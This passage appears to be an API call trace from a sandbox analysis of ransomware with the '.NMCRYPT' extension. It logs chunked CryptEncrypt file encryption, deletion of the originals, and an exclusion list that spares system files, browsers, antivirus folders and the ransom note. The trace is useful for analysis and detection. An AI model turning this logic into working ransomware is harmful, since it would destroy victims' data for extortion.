[0147.751] CryptDuplicateKey (in: hKey=0x9ad1f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad278) returned 1 [0147.751] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0147.751] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0147.751] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2600) returned 1 [0147.751] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0147.752] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.753] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.753] GetLastError () returned 0x0 [0147.753] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.754] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.754] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.754] GetLastError () returned 0x0 [0147.754] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.754] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.754] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.754] GetLastError () returned 0x0 [0147.754] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.755] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.755] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.755] GetLastError () returned 0x0 [0147.755] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.755] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.755] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.755] GetLastError () returned 0x0 [0147.755] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.755] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.755] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.755] GetLastError () returned 0x0 [0147.755] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.755] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.755] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.755] GetLastError () returned 0x0 [0147.755] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.755] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.755] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.755] GetLastError () returned 0x0 [0147.755] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.755] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.755] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.755] GetLastError () returned 0x0 [0147.755] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.756] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.756] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.756] GetLastError () returned 0x0 [0147.756] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.756] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x28, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x28, lpOverlapped=0x0) returned 1 [0147.756] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x28, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x30) returned 1 [0147.756] GetLastError () returned 0x0 [0147.756] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x30, lpOverlapped=0x0) returned 1 [0147.756] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0147.756] WriteFile (in: hFile=0x588, lpBuffer=0x1d421460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0147.756] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml")) returned 0x20 [0147.756] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml", dwFileAttributes=0x20) returned 0 [0147.756] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml") returned 1 [0147.756] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml")) returned 0 [0147.757] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml" [0147.757] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0147.757] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB411.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb411.tmp")) returned 0xb411 [0147.759] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB411.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb411.tmp"), dwFlags=0x1) returned 0 [0147.759] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB411.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb411.tmp")) returned 1 [0147.759] CryptDestroyKey (hKey=0x9ad278) returned 1 [0147.759] wcslen (_String="OK") returned 0x2 [0147.759] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.759] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.759] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0147.759] CryptDestroyHash (hHash=0x9ad4b8) returned 1 [0147.759] CryptReleaseContext (hProv=0x8e3110, dwFlags=0x0) returned 1 [0147.759] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0147.759] PathMatchSpecW (pszFile="IpsPlugin.dll", pszSpec="*NMCRYPT") returned 0 [0147.759] PathMatchSpecW (pszFile="IpsPlugin.dll", pszSpec="*Recovers your files.html") returned 0 [0147.759] PathMatchSpecW (pszFile="IpsPlugin.dll", pszSpec="*.exe") returned 0 [0147.759] PathMatchSpecW (pszFile="IpsPlugin.dll", pszSpec="*.dll") returned 1 [0147.759] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0147.759] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*NMCRYPT") returned 0 [0147.759] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*Recovers your files.html") returned 0 [0147.759] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*.exe") returned 0 [0147.759] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*.dll") returned 0 [0147.760] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*.lnk") returned 0 [0147.760] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*.bat") returned 0 [0147.760] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*.ini") returned 0 [0147.760] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*.msi") returned 0 [0147.760] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*.scf") returned 0 [0147.760] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*pagefile.sys*") returned 0 [0147.760] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*NTUSER.DAT*") returned 0 [0147.760] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*AppData*") returned 0 [0147.760] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*\\winrar\\*") returned 0 [0147.760] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0147.760] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*\\java\\*") returned 0 [0147.760] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0147.760] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*\\windows\\*") returned 0 [0147.760] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*\\ESET\\*") returned 0 [0147.760] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*\\AVG\\*") returned 0 [0147.760] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*\\AVIRA\\*") returned 0 [0147.760] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0147.760] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*Atheros*") returned 0 [0147.760] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*Realtek*") returned 0 [0147.760] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*bootmgr*") returned 0 [0147.760] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*boot*") returned 0 [0147.760] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*boot*") returned 0 [0147.760] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*CONFIG.SYS*") returned 0 [0147.760] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*IO.SYS*") returned 0 [0147.760] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*MSDOS.SYS*") returned 0 [0147.760] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*NTDETECT.COM*") returned 0 [0147.760] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*ntldr*") returned 0 [0147.760] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*chrome*") returned 0 [0147.760] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*opera*") returned 0 [0147.760] PathMatchSpecW (pszFile="ipsptb.xml", pszSpec="*firefox*") returned 0 [0147.760] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml", pszSpec="*") returned 1 [0147.760] strlen (_Str="NMoreira") returned 0x8 [0147.760] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.760] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.760] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.760] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.760] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.760] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.760] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.760] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.760] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.760] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.760] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.760] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.760] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.760] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.760] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.761] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | 